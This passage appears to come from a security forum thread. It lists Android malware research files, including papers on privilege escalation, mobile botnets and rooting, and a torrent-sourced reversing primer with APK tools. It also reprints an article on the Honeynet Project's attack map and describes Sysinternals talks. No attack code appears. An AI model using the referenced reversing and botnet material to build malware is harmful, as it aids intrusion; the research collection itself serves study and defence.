      Bypassing the Android Permission Model.ppt
      CNCCS-Smartphone-Malware-Full-Report-Translated-06-7-11-FINAL.pdf
      codegate2k10tora-100426060011-phpapp01.pdf
      codeobfuscation-110909001233-phpapp01.pptx
      COMPLETE-DroidDream-Technical-Tear-Down_Lookout-Mobile-Security.pdf
      Cryptography for mobile malware obfuscation.pdf
      Dan_Guido_Mike_Arpaia_Mobile_Exploit_Intelligence_Project.pdf
      demystifying-android.pdf
      Design of SMS Commanded-and-Controlled and P2P-Structured Mobile Botnets.pdf
      Detecting Android Malware on Network Level.pdf
      Detection of Malicious Applications on Android OS.pdf
      Detection of Smartphone Malware.pdf
      dissecting-andro-malware_33754.pdf
      Documentation reverse-engineering avancé DALVIK.pdf
      Fuzzing the Phone in your Phone.pdf
      Geinimi_Trojan_Teardown.pdf
      GeorgiaW_Smartphone_Bots_SLIDES_Shmoocon2011.pdf
      HackingyourDroid-Slides.pdf
      History-of-Mobile-Malware.pdf
      HPW2011 - Reversing Android Malware - Mahmud Ab Rahman.pdf
      INSECURE-Mag-34.pdf
      InsomniDroid CrackMe Spoiler Insomni'hack 2012.pdf
      isec_android_exploratory_blackhat_2009.pdf
      jnpr-2011-mobile-threats-report.pdf
      linux_versus_android.pdf
      lookout-mobile-threat-report-2011.pdf
      Malicious Mobile Threats Report 2010-2011.pdf
      Malware in iOS and Android... The gathering storm.pdf
      Meyers - Reserve Engineers Mobile Apps.pdf
      Mila Parkour-MOBILEMALWARE-20120619-3041.zip
      Mobile Malware Analysis - Process Monitor Tool.pdf
      Mobile Malware Evolution and the Android Security Model.pdf
      MobileThreatReport_Q1_2012.pdf
      Mobile_Threat_Report_Q4_2011.pdf
      motivations_of_recent_android_malware.pdf
      MyCERT-3-PST-HoneynetConf-Reversing Android Malware.pdf
      NDSS_2012_Towards_Taming_Privilege-Escalation_Attacks_on_Android.pdf
      Practice of Android Reverse Engineering.pdf
      Presentation_DyAnA_SigInt2012_2012-05-20.pdf
      Privilege Escalation Attacks on Android.pdf
      Reducing the Window of Opportunity for Android Malware Gotta catch 'em all.pdf
      Reverse Engineering of the Android File System.pdf
      Reversing Android Apps.pdf
      Reversing Android.pdf
      ReversingAndroid.pdf
      RFJ2009-NordSec.pdf
      Rise of the iBots 0wning a telco network.pdf
      Rooting Android - Extending the ADB by an Auto-Connecting WiFi-Accessible Service.pdf
      rp-quarterly-threat-q1-2011.pdf
      rpt_security_in_the_age_of_mobility.pdf
      slides_Android_L3info.pdf
      Smartphone Malware Evolution Revisited Android Next Target.pdf
      SOCIAL NETWORKING FOR BOTNET.pdf
      spsm11-burguera.pdf
      sp_android-malware-sms-relay-tip-of-iceberg.pdf
      SSTIC2011-Slides-Securite_Android-ruff.pdf
      SteveFox_MobileBotnetTrends2011_v2 (1).pdf
      summercon10-androidhax-jonoberheide.pdf
      Sécurité du Système Android.pdf
      taming_the_robot_droidcon11_talk.pdf
      The Case for SE Android.pdf
      The_Dalvik_Virtual_Machine.pdf
      Understanding Android Security
      Understanding Android Security.pdf
      understandingandroidsecuritymodel-110304193331-phpapp01.pptx
      when-android-apps-want-more-than-they-need.pdf
      wp-android-malware-past-present-future.pdf
      Yxes-Apvrille-EICAR2010.pdf
      "Andromaly" a behavioral malware detection.pdf
      └───Primer On AndroidOS Reversing
          │   ARTeam.esfv
          │   Read Me First.txt
          │   Torrent downloaded from Demonoid.me.txt
          ├───tools
          │   ├───Decompiler
          │   │       baksmali.jar
          │   │       smali.jar
          │   └───Signing APKs
          │           autosign.bat
          │           setx.exe
          │           testsign.jar
          │           testsign_apk.reg
          └───Tutorial
                  FullTuT.htm
                  FullTuT.swf
                  FullTuT.txt

      Download: https://www.dropbox.com/sh/e2qo3ik9ubdz7h2/muZT8lC7gs
      Source: http://twitter.com/i7s3curi7y
  21. It looks like something you’d see in a 1980s film about a nuclear apocalypse. A screen in a control room in an underground bunker, where our mutually assured destruction was being mapped out. In fact it’s a real-time visualization of computers attacking other computers.

      The Honeynet Project, which runs the map, works by setting up “honeypot” sensors, computers that behave as potential targets for malware. The red markers on the map symbolize the attacks, mostly from botnets and worms. The yellow are the honeypots. The worms attempt to exploit the sensors by scanning them and looking for open ports. Just like the famed femmes fatales in the world of espionage, honeypots mimic vulnerabilities in order to learn how attackers operate and what tactics they use.

      In the text scroll on the map, you can see where the attacks are coming from -- mostly from Russia, the United States, Brazil, and Eastern Europe. The recipient of the attack is always one of the sensors, so for instance Aachen, Germany, comes up a lot as the project hosts a sensor at a university there.

      “The actual location of these sensors could be university server rooms or living rooms at home and they are mostly dedicated computers or virtual machines,” says Mark Schloesser, a research assistant at the RWTH Aachen University who is involved with the project.

      I asked Schloesser whether the map is representative of reality or is it skewed by where they have sensors:

      That depends on the worm code that actually attacks the sensors. Historically this kind of visualization would be skewed by the sensor location but with newer attack code (e.g. Conficker) [a computer worm] this is not true anymore, as the attack target selection is randomized. This means that an infected machine in Russia has the same chance of attacking Aachen as it has in attacking China.

      This means that the red dots roughly depict reality, but the amount of events is high at big sensors and low at small sensors.

      There have been other visualizations of network attacks. Check out this one from Akamai. And if you thought packets of data couldn’t be beautiful, have a look at this stylized visualization of cybercriminals hitting a VOIP (Voice over Internet protocol) server.

      WATCH: Visualizing a cyberattack on a VOIP server from Ben Reardon, Dataviz Australia on Vimeo.

      Just like disease tracking, the initiative could be helpful in helping fight malware, as Kyt Dotson points out at Silicon Angle:

      With data collection ventures like the Honeynet Project and a strong sifting through of the Big Data by security researchers and other outfits, we might see a revolution in how we track and prepare for the malware storms of the future. Mobile devices and PCs could make good use of anti-virus companies having access to knowledge of what’s trending so that they can prepare their flu-shots and vaccines early by prototyping and fingerprinting new malware.

      Japan's National Institute of Information and Communications Technology is doing this with its project Daedalus, which visualizes network attacks in real time.

      But for now the people behind HoneyMap are aware of its limited functionality. “To be honest, this specific visualization just looks nice and raises awareness about the still-existing worm infections and automated spreading code in use. In terms of actionable intelligence, you can't get a lot out of this,” Schloesser says. “In the future, as we add more sensor types and data sources, we hope that we can use the map as an easy monitoring solution and representation of Honeynet coverage. Also, for other botnet/worm families and other sensor types it actually might yield some insights. Right now it gives a purpose to our big screen at the office.”

      Source: http://www.rferl.org/content/watch-the-worlds-computers-attack-each-other-in-real-time/24719218.html
  22. Download: http://www.ansav.com/get.php?f=ScAnsav_asm.zip http://www.ansav.com/
  23. If you want to know the difference between System Committed memory and Process Committed memory, wondered what all those memory numbers shown by Task Manager really mean, or want to gain insight into the memory-related impact of a process, then this talk is for you. Using various memory analysis tools including: Process Explorer, VMMap, RAMMap, and others to highlight concepts throughout, the presentation starts with an overview of virtual memory management, describing types of process address space memory and how they impact system virtual memory. Then it dives into physical memory management, discussing how Windows manages process working sets, how it keeps track of physical memory, and how memory moves between different states. part 1: Mysteries of Memory Management Revealed (Part 1 of 2) part 2: Mysteries of Memory Management Revealed (Part 2 of 2) Speakers: Mark Russinovich Source: http://channel9.msdn.com/Events/Speakers/Mark+Russinovich
  24. Speakers: Mark Russinovich Come hear Mark Russinovich, the master of Windows troubleshooting, walk you through step by step how he has solved seemingly unsolvable system and application problems on Windows. With all new real case studies, Mark shows how to apply the Microsoft Debugging Tools and his own Sysinternals tools, including Process Explorer, Process Monitor, to solve system crashes, process hangs, security vulnerabilities, DLL conflicts, permissions problems, registry misconfiguration, network hangs, and file system issues. These tools are used on a daily basis by Microsoft Product Support and have been used effectively to solve a wide variety of desktop and server issues, so being familiar with their operation and application will assist you in dealing with different problems on Windows. video: Case of the Unexplained 2012: Windows Troubleshooting with Mark Russinovich | TechEd North America 2012 | Channel 9 Slides (view online) source: http://channel9.msdn.com/Events/TechEd/NorthAmerica/2012/WCL301
  25. Speakers: Mark Russinovich video: Malware Hunting with the Sysinternals Tools | TechEd Europe 2012 | Channel 9 Slides (view online) source: http://channel9.msdn.com/Events/Speakers/Mark+Russino